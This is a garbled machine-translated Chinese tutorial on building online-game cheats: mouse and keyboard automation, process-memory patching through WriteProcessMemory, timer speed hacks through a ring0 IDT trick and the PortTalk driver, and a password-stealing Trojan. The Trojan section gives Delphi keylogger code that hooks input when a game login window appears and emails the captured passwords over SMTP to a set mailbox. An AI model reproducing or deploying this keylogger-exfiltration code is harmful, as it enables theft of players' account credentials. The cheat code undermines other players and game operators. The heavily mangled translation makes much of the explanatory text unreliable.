In a few years ago, I saw that someone else played online games, and I was really uncomfortable as a programmer. I want to figure out what is going on. I took some to study, I have a personal experience, and I will share it with everyone. I don't have a few more ways (according to the difficulty of production): 1, action, so-called action, means using the API send command to the window or API control Mouse, keyboard, etc., so that the characters in the game flow or attack, the earliest "stone" plug-in is this way. (This plug-in is entirely garbage, TMD, as long as people who will know some API know what to do, but this plug-in is also entrance-level good stuff, although you can't improve your combat power, but you can improve your morale) 2 Local modification, this plug-in has some of the traditional game modifiers, doing this plug-in programming only a little understanding of the memory address and master the API can be realized, "Elf" is this way. Written, it is difficult to find those address code, find the address, usually to use the tools of others, some games have two-code check, is looking for more difficult. (This plug-in is more difficult than the previous one, but this plug-in can be used, it is also difficult ~~, this plug-in can quickly improve your understanding and application of memory address, it is you The programming technology is a good Dongdong) 3, Trojan, this plug-in purpose is to help the plug-in producer to steal the user's password (TMD, "bad" is a word, but you have to know that it is known to talk about it ~ ~), Doing this plug-in, there is a certain difficulty, you need hook or keyboard monitoring technology to make a foundation can be done, its principle is first cutting the user's account or password, and then send it to the specified mailbox. (I have written such a stuff before, but I have never used it. I know that this kind of Dongdong is very unethical, so don't use it in the future!) 4, accelerate, this plug-in can speed up the speed of the game ... (I am sorry for everyone, I don't actually have done it, so I can't be self-suited, I'm embarrassed, the first three can be better implemented in languages such as VB, Delphi, and then use VC. The next layer supports a better programming tool. The action plug-in first, first talk about the plug-in plug-in, which is the easiest way to do when I first write. I remember that I was still in the "Stone" era, I saw that someone hang a software (plug-in), I could go four outsight (I didn't know how to hang it outside), so I found this software ( After taking it, I listened to someone to say this. This is not difficult to realize it. It is not difficult to realize it. It is not difficult to see that in fact the people's walking is not the mouse, and it will be achieved. The impulsive impulsive, then ran to the MSDN and see some information, found this kind of function, only a few simple API functions can be done: 1, first we have to know the position of the mouse (for easy reducing now The location of the mouse is to use the API function getCursorpos, which is used as follows:
Bool getCursorpos (LPPOINT LPPOINT / / ADDRESS OF STRUCTURE for Cursor Position);
Bool setCursorpos (int X, // horizontal position int y // vertical position); 3, analog mouse issues actions and release actions, we have to use the mouse_event function to implement, and use the method of use:
VOID mouse_event (DWORD dwFlags, // flags specifying various motion / click variantsDWORD dx, // horizontal mouse position or position changeDWORD dy, // vertical mouse position or position changeDWORD dwData, // amount of wheel movementDWORD dwExtraInfo // 32 bits of application -defined information; at its dwflags, the available events are like mobile mouseeventf_move, the left mouseeventf_leftdown, the left mouseeventf_leftup, the specific stuff is still checked MSDN ~~~~~~~ In the previous knowledge, we can take a look at how the characters are removed:
GetCursorpos (Point); SetCursorpos (Ranpoint (80, Windowx), Ranpoint (80, Windowy)); // Ranpoint is a homemade random coordinate function mouse_event (MouseEventf_leftdown, 0, 0, 0, 0); mouse_event (MouseEventf_leftup, 0, 0, 0, 0); SetCursorpos (Point.x, Point.y); Look at the above code, is it very simple to see the characters ~~, give a three, there is a lot of good Dongdong can use This skill is achieved (I have said, TMD, this is the practice of garbage, I believe it ~~~), next, then look at the automatic attack in the game (required to attack the shortcut " The truth is still the same, just use the API difference ~~~, this time we want to use the keybd_event function, the usage is as follows:
VOID keybd_event (BYTE bVk, // virtual-key codeBYTE bScan, // hardware scan codeDWORD dwFlags, // flags specifying various function optionsDWORD dwExtraInfo // additional data associated with keystroke); we have to know the scan code can not be used directly to Turn the key value into a scan code with a function mappvirtualkey, and the specific usage method of MapVirtualKey is as follows:
Uint MapVirtualKey (uint ucode, // virtual-key code or scan code umapType // translation to perform); Ok, ratio, this quick pick button is Ctrl A, let us look at how the actual code is written:
keybd_event (VK_CONTROL, mapvirtualkey (VK_CONTROL, 0), 0,0); keybd_event (65, mapvirtualkey (65,0), 0,0); keybd_event (65, mapvirtualkey (65,0), keyeventf_keyup, 0); keybd_event ( VK_Control, MapVirtualKey (vk_control, 0), keyeventf_keyup, 0); First simulate pressing the CTRL button, then simulates pressing the A key, then simulates the A key, finally release the CTRL button, this is an analog press shortcut cycle. (Seeing this, almost a certain understanding of the simple exterior ~~~~ Do you try? If you give an imitation, you can have a better Dongdong, this is going to see your comprehension. ~~, but don't be happy too early this, there is a more complex Dongdong waiting for you ~~) Local modified plug-in now, let's take a look, more plug-in plug-in - local modification The entire production process of type hanged is detailed. I know that the most typical application of local modified plug-in is to play on the "Elf" game, because I am in recent years ("Elf" is still in the test stage), there are many colleagues in my company to play "Elf". So I looked at the data processing method of the game. I found that the information it sent to the server was existing in memory (I got the first feeling: Modifying this game and modifying the stand-alone version of the game. In other words, it was possible to modify the memory address before he submitted information to the server). At that time, I found that the address was changed, and sure, according to my idea, modified the address, so that the system was automatically submitted, it really succeeded. ~~~~~, later "Elf" changed to a double address school inspection, memory school inspection, etc., I will not have nonsense here ~~~~, ok, let's take a look at how this kind of plunks are made We have to have a specific understanding of Windows's memory before doing plug-in, and the memory we refers to the system's memory offset, which is relatively memory, and we have to modify it, then we To understand several Windows APIs, OK, follow examples Let us see this plug-in production and API application (in order to ensure the normal operation of online games, I don't explain the way the memory address is detailed): 1 First, we must use FindWindow, know the handle of the game window, because we have to know the ID of the process after the game is run, below is the usage of FindWindow: hWnd FindWindow (lpctstr lpClassName, // Pointer to class namelpctstr lpwindowname // pointer to window name); 2, we obtained GetWindowThreadProcessId game process corresponding to the window process ID, the function is used as follows: DWORD GetWindowThreadProcessId (HWND hWnd, // handle of windowLPDWORD lpdwProcessId // address of variable for process identifier); 3, to give After the game process ID, the next thing is to open the process with the highest permission, and the specific usage of the function OpenProcess used is as follows:
Handle OpenProcess (DWord DwdesiredAccess, // Access Flag Bool Binherithand DWProcessID // Process Identifier); in DwdesiredAccess is where access method is set, there are many permissions, we use as long as we are here Use process_all_access to open the process, other ways we can check the MSDN. 4, after opening the process, we can use the function to operate, here we use WriteProcessMemory to write data to the memory address (other way of operation, such as: ReadProcessMemory, I am here. introduced a), we look at WriteProcessMemory usage: BOOL WriteProcessMemory (hANDLE hProcess, // handle to process whose memory is written to LPVOID lpBaseAddress, // address to start writing to LPVOID lpBuffer, // pointer to buffer to write data toDWORD nsize, // Number of bytes to Writelpdword LPNUMBEROFBYTESWRITEN // Actual Number Of Bytes Written; 5, the following is done with CloseHandle Close process handle. This is a method of implementing some of this type of game, well, there is this method, we have a rational understanding, let's take a look at the actual example, improve our sense of mind, the following is the plug-in XX game Code, we should study it according to the above method:
constResourceOffset: dword = $ 004219F4; resource: dword = 3113226621; ResourceOffset1: dword = $ 004219F8; resource1: dword = 1940000000; ResourceOffset2: dword = $ 0043FA50; resource2: dword = 1280185; ResourceOffset3: dword = $ 0043FA54; resource3: dword = 3163064576; ResourceOffset4: dword = $ 0043FA58; resource4: dword = 2298478592; varhw: HWND; pid: dword; h: THandle; tt: Cardinal; beginhw: = FindWindow ( 'XX', nil); if hw = 0 thenExit; GetWindowThreadProcessId (hw, @pid); h: = OpenProcess (PROCESS_ALL_ACCESS, false, pid); if h = 0 thenExit; if flatcheckbox1.Checked = true thenbeginWriteProcessMemory (h, Pointer (ResourceOffset), @Resource, sizeof (Resource), tt) ; WriteProcessMemory (h, Pointer (ResourceOffset1), @ Resource1, sizeof (Resource1), tt); end; if flatcheckbox2.Checked = true thenbeginWriteProcessMemory (h, Pointer (ResourceOffset2), @ Resource2, sizeof (Resource2), tt); WriteProcessMemory (h, pointer (resourceoffset3), @ resource3, sizeof (resource3), tt); WriteProcessMemory (H, Pointer (ResourceOffset4), @ Resource4, SIZ EOF (Resource4), TT); END; MessageBeep (0); CloseHandle (H); Close; This game is used to verify the data you want to submit, so this game plug-in production is not very difficult. The hardest is to find these addresses. Trojan plug-in roof plug-in, maybe mostly like Trojans, is the Southam Side East that helps do plug-in accounts and passwords. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology. We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window. 2. Judging whether the login window appears. 3. If the login window appears, log the keyboard. 4. When the window is closed, the record information is sent to the programmer's mailbox.
I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation: So how do we judge whether the login window does not appear? In fact, this is very simple, we can easily implement it with the FindWindow function: hWnd FindWindow (lpctstr lpclassname, // pointer to class namelpctstr lpwindowname // Pointer to window name); actual program implementation, we have to find the 'XX' window , Use FindWindow (NIL, 'XX') if the window has appeared when the return value is greater than 0, then we can record the keyboard information. First, we use the SETWINDOWSHOKEX to set up the monitoring log, and the usage of this function is as follows:
HHOOK SetWindowsHookEx (int idHook, // type of hook to installHOOKPROC lpfn, // address of hook procedureHINSTANCE hMod, // handle of application instanceDWORD dwThreadId // identity of thread to install hook for); here to note is that in our program In the case of HookProc, we must implement it by writing a function, Hinstance here, we can use this program's Hinstance, specific implementation methods:
HHOOK: = SETWINDOWSHOKEX (wh_journalrRecord, hookproc, hinstance, 0); and HookProc's function is a little bit:
Function hookProc (Icode: wparam; lparam: lparam): LRESULT; stdcall; begin if FindedTitle1 file: // If the window is discovered BeGin if (peventmsg (lparam) ^. Message = WM_KeyDown) THEN File: // Message is equal to keyboard Press hookkey: = hookkey form1.keyhookresult (peventmsg (lparam) ^. Paraml, peventmsg (lparam) ^. Paramh); file: // through key /OokResult (custom function, main function is a message) The parameter is the button name. I will convert the message in the end of the document. If Length> 0 THEN FILE: // If you get the key name begin write (hookkeyfile, hookkey); file: // write the button name to the text file hookkey: = '; end; end; end; or more is record The entire process of the keyboard, simple, if you record it, don't forget to release it, UnHookWindowshookex (HHOOK), and hHOOK, the handle returned after setting SetWindowsHookex. We have got a record of the keyboard, so now, just send the recorded information back, we have caused it. Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi. code show as below:
Assignfile (readfile, 'hook.txt'); file: // Open hook.txt This text file reset (retadfile); file: // Set to a way to read how much not Eof (readfile) do file: // Read the document begin readln (readfile, s, j); file: // read file line body: = body s; end; final: // turn off file end; nmsmtp1.encodettype: = UUMIME; file: // Set the encoded nmsmtp1.postMessage.attachments.text: = '; file: // Set attachment nmsmtp1.postMsSage.Fromaddress: =' xxx@xxx.com '; file: // Set source mail address NMSMTP1 .PostMessage.toaddress.text: = 'xxx@xxx.com'; / Set the target email address nmsmtp1.postMessage.body.text: = 'password' '' body; file: // Set the mail content nmsmtp1.postMessage. Subject: = 'password'; file: // Setting the message title nmsmtp1.sendmail; file: // Sending a message All functions have been implemented, edited. Try. Accelerated plug-in, I have always thought that acceleration plug-in is written for a game. Later, I found that this concept is wrong. The so-called accelerated plug is actually the purpose of modifying clock frequencies to accelerate. In the past DOS era, people played programming immediately thought that this is very simple, it is not to change the 8253 register. This may be able to travel in the previous DOS era, but Windows is not. Windows is a 32-bit operating system. It is not what you want to change (Microsoft's stuff is so domineering, say no change to you), but it is not impossible, we can Implementation by two methods: The first is to write a hardware driver, the second is to implement it with RING0 (this method is the author of CIH Chen Yinghao first, its principle is to modify the IDE table -> Create an interrupt Door -> Enter Ring0-> Call the interrupt modification vector, but there is no way to implement this * _ *, as a senior language user!), Use the first method to trouble, so we Here, use the second method to implement it ~~~ We will take a look before implementation: 1, we must first write a process to embed the assembly language in this process to implement the IDE table, create interrupt gate, modify vector Waiting for work 2, call this process to achieve acceleration function, now I have the way, let's take a look at the code: First we build a process, this process is the core part of this program:
Procedure String (Value: Word); stdcall; const zdh = $ 03; // set a interrupt number Varidt: array [0..5] of byte; // Save the IDT table OG: dword; // Store the old vector Beginasmpush Ebxsidt IDT // Read Interrupt Description Mark EBX, DWORD PTR [IDT 2] // IDT Subterite Add EBX, 8 * ZDH // Calculation Interrupt In Interrupt Descript Table CLI // Off Interrupt MOV DX, Word PTR [EBX 6] SHL EDX, 16D MOV DX, WORD PTR [EBX] MOV [OG], EDX MOV EAX, OFFSET @@ Ring0 // Pointing Ring0 Grade Dip Segment MOV Word PTR [EBX], AX // Low 16-bit, save in 1, 2-bit SHR EAX, 16DMOV Word PTR [EBX 6], AX // High 16-bit, save at 6, 7-bit int zdh // interrupt MOV EBX, DWORD PTR [IDT 2] / / Repositioning add ebx, 8 * zdhmov edx, [og] MOV WORD PTR [EBX], DXSHR EDX, 16DMOV WORD PTR [EBX 6], DX // Restore Changed Vector Pop ebxjmp @@ EXISM / / EXITASM @@ Ring0: // Ring0, this is also the most core Dongdong MOV Al, $ 34 // Write 8253 Control Register OUT $ 43, Almov AX, Value // Write Time OUT $ 40, Al // Write Timed value low MOV Al, AHOUT $ 40, Al // WrT value High IRETD // Return @@ EXITASM: END; END; The most core thing is already finished, most readers know it, I don't know how it is, huh, huh. However, I don't know if it happened. Let's try to use this process to do a place similar to the "shifting gear"! Put a window first, put a TrackBar control on the window to set it to 20, MIN is set to 1, set the position to 10, write in the Change event of this control:
String (Strtoint ('$' INTTOSTR (1742 (10-trackbar1.position) * 160))))))); because the default value of Windows is $ 1742, we do 1742 as the base, but because the value is, the faster, the more So slowing the principle, so I wrote such a formula, which is a Delphi ASM version of "shifting gear" (only for Win9x), huh, try it, this is very good for you, huh, huh. In Win2000, we can't achieve it directly, Ring0 is also lost, and some people will think that we can write drivers to complete, but here I tell you, Windows2000 drivers are not a VXD It can be realized, like my low hand does not write the drive WDM used by Windows, there is no way, I only have a good implementation, Prottalk is a good device driver, which is very convenient to achieve low-level ports. Operation, thereby achieving acceleration plugging. 1. Let's first have the next porttalk driver, his official website is http://www.beyondlogic.org 2, we have to copy the protttalk.sys inside. 3, build a protalk.sys interface (I want to omit, everyone can go at http://www.freewebs.com/liuyue/porttalk.pas Next PAS file yourself) 4, achieve acceleration plug-in. Let's talk about this process, if you use Prottalk to operate port, it is easy to operate more than Win98. 1. Create a new project to copy the interface files and protalk.sys to the folder saved by the project file. 2, we join our newly built projects UsesWindows, Prottalk ... 3, we create a process
Procedure String (Value: Word); Beginif Not OpenPorttalk Then Exit; Outportb ($ 43, $ 34); OUTPORTB ($ 40, LO (Value)); Outprotb ($ 40, HI (Value)); Closeporttalk; End; 4, first plus one Window, put a TRACKBAR control on the window to set its max to 20, MIN is set to 1, set the position to 10, write on this control Change Event:
Setring (Strtoint ('$' INTTOSTR (1742 (10-trackbar1.position * 160))); it is so easy.
Article Source: Western E Net
